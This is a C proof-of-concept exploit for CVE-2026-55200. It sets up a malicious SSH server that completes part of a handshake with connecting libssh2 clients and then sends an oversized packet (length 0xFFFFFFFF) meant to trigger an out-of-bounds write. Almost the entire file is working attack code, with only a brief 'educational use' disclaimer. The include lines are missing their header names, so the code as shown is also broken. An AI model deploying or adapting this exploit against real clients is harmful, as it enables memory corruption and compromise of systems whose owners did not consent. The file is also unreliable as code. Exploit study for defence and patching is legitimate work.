/* * CVE-2026-55200 Reliable PoC * Author: Ashraf Zaryouh "0xBlackash" * Improved handshake + timeout handling */ #include #include #include #include #include #include #include #include #include #define SSH_BANNER "SSH-2.0-0xBlackash-Malicious\r\n" #define MALICIOUS_PACKET_LENGTH 0xFFFFFFFFU void *handle_client(void *arg) { int client_sock = *(int *)arg; free(arg); char buffer[8192]; ssize_t n; printf("[+] Client connected. Starting handshake...\n"); // 1. Send Banner send(client_sock, SSH_BANNER, strlen(SSH_BANNER), 0); usleep(200000); // 2. Receive client banner n = recv(client_sock, buffer, sizeof(buffer)-1, 0); if (n > 0) buffer[n] = '\0'; // 3. Send fake SSH_MSG_KEXINIT unsigned char kexinit[] = { 0x00, 0x00, 0x00, 0x10, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; send(client_sock, kexinit, sizeof(kexinit), 0); usleep(300000); // 4. Try to receive client KEXINIT n = recv(client_sock, buffer, sizeof(buffer), 0); printf("[+] Handshake stage passed. Sending malicious packet...\n"); // 5. Malicious Packet unsigned char malicious[1024] = {0}; uint32_t pkt_len = MALICIOUS_PACKET_LENGTH; unsigned char pad_len = 8; memcpy(malicious, &pkt_len, 4); malicious[4] = pad_len; memset(malicious + 5, 0x41, 700); size_t total = 5 + 700 + pad_len; send(client_sock, malicious, total, 0); printf("[+] Malicious packet sent (packet_length = 0x%X)\n", MALICIOUS_PACKET_LENGTH); printf("[!] If client uses vulnerable libssh2 <= 1.11.1 → OOB write should trigger now.\n"); close(client_sock); return NULL; } int main(int argc, char *argv[]) { int server_sock, client_sock, port = 2222; struct sockaddr_in server_addr, client_addr; socklen_t addr_len = sizeof(client_addr); if (argc > 1) port = atoi(argv[1]); printf("[*] CVE-2026-55200 Reliable PoC by 0xBlackash\n"); printf("[!] Research / Educational use ONLY in isolated lab.\n"); printf("[+] Listening on port %d...\n", port); server_sock = socket(AF_INET, SOCK_STREAM, 0); int opt = 1; setsockopt(server_sock, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt)); server_addr.sin_family = AF_INET; server_addr.sin_addr.s_addr = INADDR_ANY; server_addr.sin_port = htons(port); if (bind(server_sock, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) { perror("bind"); exit(1); } if (listen(server_sock, 10) < 0) { perror("listen"); exit(1); } while (1) { client_sock = accept(server_sock, (struct sockaddr *)&client_addr, &addr_len); if (client_sock < 0) continue; printf("[+] Connection from %s:%d\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port)); int *ptr = malloc(sizeof(int)); *ptr = client_sock; pthread_t t; pthread_create(&t, NULL, handle_client, ptr); pthread_detach(t); } }